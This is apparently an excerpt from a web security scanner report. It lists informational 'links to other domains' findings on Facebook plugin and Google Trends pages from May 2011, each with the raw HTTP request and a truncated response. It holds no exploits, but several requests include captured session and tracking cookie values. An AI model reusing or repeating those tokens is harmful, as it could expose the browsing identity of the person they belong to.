<div class="UIImageBlock clearfix pas fbRecommendation RES_42cad4118afc7b4d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626" title="Google Chrome hacked with sophisticated exploit | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413216-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626" target="_top">Google Chrome hacked with sophisticated exploit | ZDNet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5b75ad11b81688dd"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/igeneration/facebook-applications-leak-users-personal-data-to-third-parties/9906" title="Facebook applications leak users&#039; personal data to third parties | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413217-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/igeneration/facebook-applications-leak-users-personal-data-to-third-parties/9906" target="_top">Facebook applications leak users&#039; personal data to third parties | ZDNet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7bea623ca0729d3c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/btl/microsofts-purchase-of-skype-one-expensive-game-of-keep-away/48511" title="Microsoft&#039;s purchase of Skype: One expensive game of keep away | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/6228715-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/btl/microsofts-purchase-of-skype-one-expensive-game-of-keep-away/48511" target="_top">Microsoft&#039;s purchase of Skype: One expensive game of keep away | ZDNet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_424733458a56ac84"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/cell-phones/teen-talk-a-15-year-olds-experiences-with-the-htc-evo-shift-4g/5892" title="Teen talk: a 15-year old&#039;s experiences with the HTC EVO Shift 4G | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413195-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/cell-phones/teen-talk-a-15-year-olds-experiences-with-the-htc-evo-shift-4g/5892" target="_top">Teen talk: a 15-year old&#039;s experiences with the HTC EVO Shift 4G | ZDNet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_222adf331acea41"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/bott/coming-soon-to-a-mac-near-you-serious-malware/3212" title="Coming soon to a Mac near you: serious malware | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413169-130-92.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.zdnet.com/blog/bott/coming-soon-to-a-mac-near-you-serious-malware/3212" target="_top">Coming soon to a Mac near you: serious malware | ZDNet</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
13.68. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=examiner.com&width=300&height=350&header=true&colorscheme=light&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.7.119
X-Cnection: close
Date: Thu, 12 May 2011 13:33:00 GMT
Elapsed: 0.044
Content-Length: 14079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_59fe7229bc38cb07"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/dogs-in-national/dog-dies-storm-drain-amidst-allegations-of-unbelievable-cruelty?CID=examiner_alerts_article&amp;fb_comment=33050746" title="Dog dies in storm drain amidst allegations of cruel disregard" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files/0c/82/stormdrain.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/dogs-in-national/dog-dies-storm-drain-amidst-allegations-of-unbelievable-cruelty?CID=examiner_alerts_article&amp;fb_comment=33050746" target="_top">Dog dies in storm drain amidst allegations of cruel disregard</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1badadf7019d206"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/progressive-in-new-orleans/should-a-ten-year-old-be-tried-for-murder-of-his-neo-nazi-father?fb_comment=33048191" title="Should a ten year-old be tried for Murder of his Neo-Nazi Father?" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files//ce/78/ce782a9f5c2d7cbf081cd21006ce43c3.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/progressive-in-new-orleans/should-a-ten-year-old-be-tried-for-murder-of-his-neo-nazi-father?fb_comment=33048191" target="_top">Should a ten year-old be tried for Murder of his Neo-Nazi Father?</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_369acca42147a0fa"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/child-development-in-baltimore/stic-man-of-dead-prez-talks-family-and-parenting?fb_comment=33052426" title="Stic.man of Dead Prez Talks Family And Parenting" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files/ae/2a/SticManRBGfitclub.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/child-development-in-baltimore/stic-man-of-dead-prez-talks-family-and-parenting?fb_comment=33052426" target="_top">Stic.man of Dead Prez Talks Family And Parenting</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_e9ee68ef502f0e8"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/dogs-in-national/animal-control-officer-placed-on-leave-as-officials-investigate-lucky?fb_comment=33075241" title="Animal control officer placed on leave as officials investigate &quot;Lucky&quot;" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files/0c/82/stormdrain_0.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/dogs-in-national/animal-control-officer-placed-on-leave-as-officials-investigate-lucky?fb_comment=33075241" target="_top">Animal control officer placed on leave as officials investigate &quot;Lucky&quot;</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5f391ce5f1f2805c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/dogs-in-national/reward-offered-for-information-on-puppy-discovered-dumpster?fb_comment=33070006" title="Reward offered for information on puppy discovered in dumpster" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files//36/4a/364a80b287d86ce86d2af9638645cedc.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/dogs-in-national/reward-offered-for-information-on-puppy-discovered-dumpster?fb_comment=33070006" target="_top">Reward offered for information on puppy discovered in dumpster</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5a258c0842a87a1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/political-buzz-in-orlando/thank-you-corporate-america?fb_comment=33082736" title="Thank you Corporate America" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files//4d/f1/4df1ba593ee19022a7cc9eff2eb846a2.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/political-buzz-in-orlando/thank-you-corporate-america?fb_comment=33082736" target="_top">Thank you Corporate America</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5e86f77bd3d0c390"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.examiner.com/political-buzz-in-fayetteville/not-one-drop-of-american-blood-worth-mosques-destroyed?fb_comment=33070791" title="Not one drop of American blood worth &quot;mosques destroyed&quot;" target="_top"><img class="img" src="http://cdn2-b.examiner.com/sites/default/files//bc/18/bc18b6b2fc78a83a2079c4e0a2b7a258.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.examiner.com/political-buzz-in-fayetteville/not-one-drop-of-american-blood-worth-mosques-destroyed?fb_comment=33070791" target="_top">Not one drop of American blood worth &quot;mosques destroyed&quot;</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
13.69. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=qo83J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.23.130
X-Cnection: close
Date: Thu, 12 May 2011 13:33:38 GMT
Elapsed: 0.060
Content-Length: 15491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nCf6D5cmADr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/EEmuV3MlHAh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/yhiZPPsJHzF.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
13.70. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?api_key=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df31fd403fc%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=625 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.87.132
X-Cnection: close
Date: Thu, 12 May 2011 13:30:13 GMT
Content-Length: 11756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
13.71. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=94783579879&width=300&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.51.122
X-Cnection: close
Date: Thu, 12 May 2011 13:29:53 GMT
Content-Length: 8996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/crenkcommunity" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/71058_94783579879_7921480_q.jpg" alt="Crenk.com" /></a>
...[SNIP]...
13.72. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.211.110
X-Cnection: close
Date: Thu, 12 May 2011 13:32:46 GMT
Content-Length: 7359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
13.73. http://www.google.com/trends/hottrends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trends/hottrends?q=angry+birds&date=2011-5-12&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=oTq4LnZEtdzKn7HNkb_Dta4Yn3_Wet9JeZqzzEO8WMho4oIfjoY99NXlJgtddLMrACItPbQPwVVZ_ffM733pwCwWO_lawUxZaY9bvbdTU3Wgu9sMqoN9ZaLEeF7qUu7D

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 12 May 2011 13:27:29 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11429

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: angry birds, May 12, 201
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.pocket-lint.com/news/39977/chrome-os-rovio-angry-birds" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.pocket-lint.com/" target="_blank"> http://www.pocket-lint.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://thenextweb.com/apps/2011/05/11/angry-birds-comes-to-the-web-courtesy-of-webgl-and-chrome/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://thenextweb.com/apps/" target="_blank"> http://thenextweb.com/apps/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://thenextweb.com/apps/2011/05/11/angry-birds-for-chrome-already-hacked-unlocking-all-levels/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://thenextweb.com/" target="_blank"> http://thenextweb.com/</a>
...[SNIP]...
13.74. http://www.google.com/trends/hottrends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trends/hottrends?q=friday+the+13th&date=2011-5-12&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=oTq4LnZEtdzKn7HNkb_Dta4Yn3_Wet9JeZqzzEO8WMho4oIfjoY99NXlJgtddLMrACItPbQPwVVZ_ffM733pwCwWO_lawUxZaY9bvbdTU3Wgu9sMqoN9ZaLEeF7qUu7D

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 12 May 2011 13:27:40 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11374

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: friday the 13th, May 12,
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/" target="_blank">
Free ...Lucky Cat... Adoption Special on <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.milehighonthecheap.com/" target="_blank"> http://www.milehighonthecheap.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html" target="_blank">
The Orange Orb: Planets Align on <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://orangeorb.blogspot.com/" target="_blank"> http://orangeorb.blogspot.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm" target="_blank">
Poll: Are You Superstitious About <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://urbanlegends.about.com/b/" target="_blank"> http://urbanlegends.about.com/b/</a>
...[SNIP]...
13.75. http://www.google.com/trends/hottrends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trends/hottrends?q=google+chrome+os&date=2011-5-12&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=oTq4LnZEtdzKn7HNkb_Dta4Yn3_Wet9JeZqzzEO8WMho4oIfjoY99NXlJgtddLMrACItPbQPwVVZ_ffM733pwCwWO_lawUxZaY9bvbdTU3Wgu9sMqoN9ZaLEeF7qUu7D

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 12 May 2011 13:27:00 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11097

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: google chrome os, May 12
...[SNIP]...
